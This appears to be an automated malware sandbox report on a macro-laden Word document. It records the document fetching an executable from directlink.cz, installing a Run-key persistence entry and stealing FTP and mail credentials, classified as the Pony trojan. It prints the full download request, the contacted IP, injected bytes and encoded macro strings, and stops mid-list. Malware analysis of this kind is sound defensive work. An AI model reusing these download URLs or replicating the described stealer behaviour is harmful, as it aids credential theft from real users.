IMG_065099102.DOC
This report is generated from a file or URL submitted to this webservice on July 18th 2017 14:15:39 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v6.80 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
-
Contains a remote desktop related string
Reads terminal service related keys (often RDP related) - Stealer/Phishing
-
Scans for artifacts that may help identify the target
Touched instant messenger related registry keys
Tries to steal FTP credentials - Persistence
-
Modifies auto-execute functionality by setting/creating a value in the registry
Writes data to a remote process - Fingerprint
-
Reads the active computer name
Scans for artifacts that may help identify the target - Evasive
- Possibly checks for the presence of an Antivirus engine
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 15
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016" (SID: 2022550, Rev: 15, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
Detected alert "ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL" (SID: 2022566, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 8/66 reputation engines marked "http://directlink.cz" as malicious (12% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 9/57 Antivirus vendors marked sample as malicious (15% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /download/6c961004be.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: directlink.cz
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
- details
- 31/80 Antivirus vendors marked dropped file "3956644.bat" as malicious (classified as "Trojan.BAT" with 38% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"WINWORD.EXE" wrote 32 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 1948)
"WINWORD.EXE" wrote 52 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 1948)
"WINWORD.EXE" wrote 4 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 1948)
"FXycd.exe" wrote 32 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
"FXycd.exe" wrote 52 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
"FXycd.exe" wrote 4 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228)
"FXycd.exe" wrote 102400 bytes to a remote process "%APPDATA%\Microsoft\FXycd.exe" (Handle: 228) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Pattern Matching
-
YARA signature match
- details
-
YARA signature "pony" classified process "FXycd.exe" as "trojan,pony" based on indicators: "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X},YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0,POST %s HTTP/1.0,Accept-Encoding: identity, *;q=0" (Author: Brian Wallace @botnet_hunter)
YARA signature "pony" classified file "all.bstring" as "trojan,pony" based on indicators: "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X},YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0,POST %s HTTP/1.0,Accept-Encoding: identity, *;q=0" (Author: Brian Wallace @botnet_hunter)
YARA signature "WarpStrings" classified file "ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc.bin" as "warp,apt,beebus" based on indicators: "wyle" (Author: Seth Hardy) - source
- YARA Signature
- relevance
- 10/10
-
YARA signature match
-
Spyware/Information Retrieval
-
Scans for artifacts that may help identify the target
- details
-
"FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
"FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"FXycd.exe" (Path: "HKCU\IDENTITIES\{57AB3677-534E-4173-8F92-6566F6F82F10}\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\OUTLOOK\OMI ACCOUNT MANAGER\ACCOUNTS") - source
- Registry Access
- relevance
- 3/10
-
Touched instant messenger related registry keys
- details
- "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
- source
- Registry Access
- relevance
- 5/10
-
Tries to steal FTP credentials
- details
-
"Software\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
"RushSite.xml" (Indicator: "rushsite.xml")
"\VanDyke\Config\Sessions" (Indicator: "\vandyke\config\sessions") - source
- File/Memory
- relevance
- 6/10
-
Scans for artifacts that may help identify the target
-
Unusual Characteristics
-
Document analysis contacts a domain
- details
-
Often seen on documents with macro droppers
embedded files or exploits - source
- Indicator Combinations
- relevance
- 3/10
-
Document analysis contacts a domain
-
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 26
-
Anti-Reverse Engineering
-
Looks up many procedures within the same disassembly stream (often used to hide usage)
- details
-
Found 11 calls to GetProcAddress@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
Found 47 calls to GetProcAddress@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Looks up many procedures within the same disassembly stream (often used to hide usage)
-
Environment Awareness
-
Reads the active computer name
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"FXycd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
-
Reads the active computer name
-
Exploit/Shellcode
-
Found URL in decoded VBA string
- details
-
Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/picture"
Pattern match: "http://schemas.openxmlformats.org/schemaLibrary/2006/main"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"
Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
Heuristic match: "vnd.ms"
Pattern match: "http://schemas.openxmlformats.org/markup-compatibility/2006"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships" - source
- File/Memory
- relevance
- 10/10
-
Found URL in decoded VBA string
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
8/66 reputation engines marked "http://directlink.cz" as malicious (12% detection rate)
1/63 reputation engines marked "http://julybazed.pw" as malicious (1% detection rate) - source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
General
-
Contains ability to find and load resources of a specific module
- details
-
FindResourceA@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
FindResourceA@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
FreeResource@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Opened the service control manager
- details
-
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"FXycd.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
-
Requested access to a system service
- details
-
"WINWORD.EXE" called "OpenService" to access the "rasman" service
"WINWORD.EXE" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"WINWORD.EXE" called "OpenService" to access the "RASMAN" service
"FXycd.exe" called "OpenService" to access the "ProtectedStorage" service
"FXycd.exe" called "OpenService" to access the "ProtectedStorage" service requesting "SERVICE_START" (0X10) access rights - source
- API Call
- relevance
- 10/10
-
Sent a control code to a service
- details
- "FXycd.exe" called "ControlService" and sent control code "0X400" to the service "ProtectedStorage"
- source
- API Call
- relevance
- 10/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Contains ability to download files from the internet
- details
-
recv@WSOCK32.DLL from FXycd.exe (PID: 2580) (Show Stream)
recv@WSOCK32.DLL from FXycd.exe (PID: 2580) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%APPDATA%\Microsoft\FXycd.exe", Handle: )
"FXycd.exe" is creating a new process (Name: "%APPDATA%\Microsoft\FXycd.exe", Handle: ) - source
- API Call
- relevance
- 8/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
-
"FXycd.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
"FXycd.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "FXYCD.EXE"; Value: "%APPDATA%\ASound.exe") - source
- Registry Access
- relevance
- 8/10
-
Contains ability to download files from the internet
-
Network Related
-
Found potential IP address in binary/memory
- details
- "2.5.29.37"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
Pattern Matching
-
Contains ability to download files from the internet
- details
-
recv@WSOCK32.DLL from FXycd.exe (PID: 2580) (Show Stream)
recv@WSOCK32.DLL from FXycd.exe (PID: 2580) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to download files from the internet
-
Remote Access Related
-
Contains a remote desktop related string
- details
-
"3inv2%U96vWuj*fJS@2U2w0|vncFV<Y2`KO9wm?MFp~ws:l`kB" (Indicator for product: Generic VNC)
"J-LS`LWA9zvnc>'FQ%TmWhLTZhTEWHn SpyX#o,J2h'uni"@v*1cw!" (Indicator for product: Generic VNC) - source
- File/Memory
- relevance
- 10/10
-
Reads terminal service related keys (often RDP related)
- details
- "FXycd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
- source
- Registry Access
- relevance
- 10/10
-
Contains a remote desktop related string
-
Spyware/Information Retrieval
-
Contains ability to enumerate processes/modules/threads
- details
- CreateToolhelp32Snapshot@KERNEL32.DLL from FXycd.exe (PID: 2580) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Contains ability to retrieve keyboard strokes
- details
-
GetKeyboardState@USER32.DLL from FXycd.exe (PID: 1904) (Show Stream)
GetKeyboardState@USER32.DLL from FXycd.exe (PID: 1904) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 8/10
-
Contains ability to enumerate processes/modules/threads
-
System Security
-
Contains ability to impersonate another user on the local machine
- details
- LogonUserA@ADVAPI32.DLL from FXycd.exe (PID: 2580) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Modifies proxy settings
- details
-
"FXycd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"FXycd.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK") - source
- Registry Access
- relevance
- 8/10
-
Contains ability to impersonate another user on the local machine
-
Unusual Characteristics
-
Contains embedded VBA macros with interesting strings
- details
-
Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2006/xmlPackage"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/package/2006/relationships""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme""
Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2006/relationships/vbaProject""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/markup-compatibility/2006"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/relationships""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/math"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/wordprocessingml/2006/main""
Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordml"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingGroup""
Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingInk"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2006/wordml""
Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word/2010/wordprocessingShape"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/drawingml/2006/main""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/drawingml/2006/picture"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/2006/relationships/wordVbaData""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/schemaLibrary/2006/main"", Found pattern type "URL" with value: "http://schemas.microsoft.com/office/word""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"", Found pattern type "URL" with value: "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes""
Found pattern type "URL" with value: "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"", Found pattern type "URL" with value: "http://purl.org/dc/elements/1.1/""
Found pattern type "URL" with value: "http://purl.org/dc/terms/"", Found pattern type "URL" with value: "http://purl.org/dc/dcmitype/""
Found pattern type "URL" with value: "http://www.w3.org/2001/XMLSchema-instance"", Found pattern type "Executable file name" with value: "microsoft.com" - source
- Static Parser
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e99e4819f4" to virtual address "0x75373D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "a71d5434" to virtual address "0x690310AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e249c834" to virtual address "0x6BC6F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "e96033f5f3" to virtual address "0x755F4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e92399f7f3" to virtual address "0x755F5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "6dbbcb34" to virtual address "0x6A7678E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "7739eb7679a8ef76be72ef76d62def761de2ea7605a2ef76c868ee7657d1f576bee3ea76616fef766841ed760050ed7600000000ad3709778b2d0977b641097700000000" to virtual address "0x74A21000" (part of module "WSHIP6.DLL")
"WINWORD.EXE" wrote bytes "9cf6940b" to virtual address "0x68D242C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "92e6ea7679a8ef76be72ef76d62def761de2ea7605a2ef76bee3ea76616fef766841ed760050ed7600000000ad3709778b2d0977b641097700000000" to virtual address "0x744F1000" (part of module "WSHTCPIP.DLL")
"WINWORD.EXE" wrote bytes "44515e34" to virtual address "0x68F29904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e99a54f4f3" to virtual address "0x755F3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9c53234f4" to virtual address "0x757A6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "c4ca367580bb3675aa6e37759fbb367508bb367546ce367561383775de2f3775d0d9367500000000177975754f9175757f6f7575f4f7757511f77575f2837575857e757500000000" to virtual address "0x6E081000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "393d9834" to virtual address "0x2F851B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "473c2034" to virtual address "0x69760BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e93655f5f3" to virtual address "0x755F3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b834000000663d33c0baf498140568dcf53466c3" to virtual address "0x0514905C"
"WINWORD.EXE" wrote bytes "4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62def760000000020692a750000000029a6367500000000a48d2a7500000000f70e367500000000" to virtual address "0x76FE1000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "2e6acc34" to virtual address "0x6D06CA70" (part of module "GFX.DLL")
"FXycd.exe" wrote bytes "4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62def760000000020692a750000000029a6367500000000a48d2a7500000000f70e367500000000" to virtual address "0x76FE1000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Writes PE header magic to ADO Stream Object
- details
-
"WINWORD.EXE" called "ADODB.Stream.6.0.Write" and wrote "MZP"
which might be a PE fixup attempt ... - source
- API Call
- relevance
- 5/10
-
Contains embedded VBA macros with interesting strings
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 32
-
Anti-Detection/Stealthyness
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "WINWORD.EXE" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from FXycd.exe (PID: 2580) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
- details
-
Found reference to API InitCommonControlsEx@COMCTL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
Found reference to API ImageList_WriteEx@COMCTL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
Found reference to API InitializeFlatSB@COMCTL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
Found reference to API FlatSB_GetScrollRange@COMCTL32.DLL from FXycd.exe (PID: 1904) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetLocalTime@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
-
GetVersionExA@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
GetVersion@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
GetVersion@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
GetVersionExA@KERNEL32.DLL from FXycd.exe (PID: 2580) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query volume size
- details
- GetDiskFreeSpaceA@KERNEL32.DLL from FXycd.exe (PID: 1904) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 3/10
-
Found a dropped file containing the Windows username (possible fingerprint attempt)
- details
- Found dropped filename "4z46j5z@directlink[1].txt" containing the spoofed Windows username "4z46j5z"
- source
- Binary File
- relevance
- 5/10
-
Makes a code branch decision directly after an API that is environment aware
- details
-
Found API call GetVersion@KERNEL32.DLL (Target: "FXycd.exe"; Stream UID: "00017995-00001904-27735-3016-00449E3C")
which is directly followed by "cmp ax, 0004h" and "setnb byte ptr [0049BAB0h]". See related instructions: "...
+26 call 00406958h ;GetVersion
+31 and eax, 000000FFh
+36 cmp ax, 0004h
+40 setnb byte ptr [0049BAB0h]" ... from FXycd.exe (PID: 1904) (Show Stream)
Found API call GetVersion@KERNEL32.DLL (Target: "FXycd.exe"; Stream UID: "00017995-00001904-27735-3075-0044E768")
which is directly followed by "cmp ax, 0004h" and "jc 0044E91Eh". See related instructions: "...
+156 call 00406958h ;GetVersion
+161 and eax, 000000FFh
+166 cmp ax, 0004h
+170 jc 0044E91Eh" ... from FXycd.exe (PID: 1904) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Reads the cryptographic machine GUID
- details
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103") - source
- Registry Access
- relevance
- 10/10
-
Contains ability to query machine time
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Accesses System Certificates Settings
- details
- "FXycd.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
- source
- Registry Access
- relevance
- 10/10
-
Contacts domains
- details
- "directlink.cz"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "107.154.161.190:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
- details too long to display
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "xmlns:pkg=http://schemas.microsoft.com/office/2006/xmlPackage><pkg:part"
Normalized macro string: "xmlns=http://schemas.openxmlformats.org/package/2006/relationships><Relationship"
Normalized macro string: "xmlns:wps=http://schemas.microsoft.com/office/word/2010/wordprocessingShape><w:body><w:p"
Normalized macro string: "xmlns:a=http://schemas.openxmlformats.org/drawingml/2006/main><a:graphicData"
Normalized macro string: "uri=http://schemas.openxmlformats.org/drawingml/2006/picture><pic:pic"
Normalized macro string: "xmlns:pic=http://schemas.openxmlformats.org/drawingml/2006/picture><pic:nvPicPr><pic:cNvPr"
Normalized macro string: "httpfaznv"
Normalized macro string: "VlJlT2hPZkhVU2xQeFV6U3RDTmF1QkFtRENFWGpHcU5aUFR0dUR1aW1TZENZWlRmTnNxbHRMZVVS"
Normalized macro string: "httpg"
Normalized macro string: "cPRRm8NRR2/UdQGY6UlTFWLXNzE+Fb78n18Lf/oXf6OX/5LwnGc9WWGoBeZaGQhrYhR7wlHbttpg"
Normalized macro string: "httpenqacd9hemwk9b"
Normalized macro string: "56B2aFG7tUj9VT1aUdWJAWhXnTp0tKvPt8EI8Nt0q9paZcCbNDta9AxH9feF/m6DWamk4X9zbbHD"
Normalized macro string: "http7x/3v34rtttkszvupb4fbdn4/voc9hxaadoe//+psspoo/wlodobzn3qb6rzj"
Normalized macro string: "vPmKsO3Y7dHsTTP7X/3V34RTTtkSzvupB4fbdn4/vOc9HxAADOE//+PSsPOO/WLodobzn3qB6rzJ"
Normalized macro string: "httpktj"
Normalized macro string: "56Rayj2+MYC2doYtRNugw92BLCqAsVHpbGyj7N6k7hSJFz7xbx8Kd+2+UnX+TOjta9PCskeMtPrJ"
Normalized macro string: "httpm"
Normalized macro string: "f9XeKdlpscR4Ctgc0+LHtn5kEaDnWKRZDGxkKBTbAcDnDqIGeKxGnS1+pAVHb9h4WiDfxAKaaimB"
Normalized macro string: "httpyr3aa"
Normalized macro string: "bDW5bvtZUVTkDwMIEIwsh9lEmm1cwxvb6lwHKLF9zFPX+kJqJ36zetZvtDaPTByfhrz53oJazUAf" - source
- File/Memory
- relevance
- 10/10
-
Creates mutants
- details
-
